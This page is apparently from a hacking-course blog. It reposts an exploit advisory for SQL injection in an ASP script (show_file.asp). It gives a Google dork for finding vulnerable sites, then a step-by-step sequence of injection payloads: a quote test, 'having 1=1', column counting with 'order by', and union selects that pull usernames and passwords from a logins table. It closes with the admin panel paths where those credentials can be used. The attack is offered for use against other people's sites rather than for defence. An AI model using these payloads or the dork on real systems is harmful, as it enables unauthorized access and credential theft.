ASP Exploitation SQL Injection Vulnerability | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

ASP Exploitation SQL Injection Vulnerability



  1. =============================================
  2. ASP Exploitation SQL Injection Vulnerability
  3. =============================================
  4. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
  5. 0     _                   __           __       __                     1
  6. 1   /' \           __  /'__`\       /\ \__  /'__`\                   0
  7. 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
  8. 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\         0
  9. 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
  10. 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\          0
  11. 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
  12. 1                  \ \____/ >> Exploit database separated by exploit   0
  13. 0                   \/___/          type (local, remote, DoS, etc.)    1
  14. 1                                                                      0
  15. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
  16.  
  17. #######################################################################
  18. #
  19. # Exploit Title: [ ASP Exploitation SQL Injection Vulnerability ] ..
  20. #
  21. # Date: [ 2010-06-17 ] ..
  22. #
  23. # Author: [ SA H4x0r ] ..
  24. #
  25. # Version: [ Scripts((asp)) ] ..
  26. #
  27. # Google dork: [ show_file.asp?num= ] ..  
  28. #
  29. # Email: [ ww0@hotmail.com ] ..
  30. #
  31. # From: Saudi Arabia ..
  32. #
  33. # Gr33t's: The Master|Al-Kaser20|v4-team|Mn7os|inj3ct0r|exploit-db ..
  34. #
  35. #category: [SQL Injecti0n] ..
  36. #
  37. #######################################################################
  38.  
  39. # Exploit :  
  40.  
  41. http://[site]/path/show_file.asp?num={SQL}  
  42.  
  43. # Analysis:
  44.  
  45. http://[site]/path/show_file.asp?num=Number  
  46.  
  47. union select ((Number)) login, ((Number)) from logins  
  48.  
  49. ========================================================================
  50.  
  51. # Like:
  52.  
  53. http://[site]/path/show_file.asp?num=50
  54.  
  55. http://[site]/path/show_file.asp?num=50'
  56.  
  57. http://[site]/path/show_file.asp?num=50 having 1=1
  58.  
  59. ((')) <<<<< Keep the label to show a query site involved ..
  60.  
  61. (( having 1=1 )) << Yes, this revealed the site involved ..
  62.  
  63. ========================================================================  
  64.  
  65. # Like:1
  66.  
  67. http://[site]/path/show_file.asp?num=50 order by 20
  68.  
  69. union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from logins  
  70.  
  71. union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,name,19,20 from logins
  72.  
  73. union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,18,19,20 from logins
  74.  
  75. ========================================================================
  76.  
  77. # Final:
  78.  
  79. http://[site]/path/show_file.asp?num=-50 union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,name,19,20 from logins
  80.  
  81. The source of plaque control:-
  82.  
  83. http://[site]/path/admin "OR" http://[site]/path/login
  84.  
  85. cpanel: http://[site]/admin "OR" http://[site]/login
  86.  
  87. ========================================================================
  88.  
  89. ./done ..




Share your views...

0 Respones to "ASP Exploitation SQL Injection Vulnerability"

Post a Comment

 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com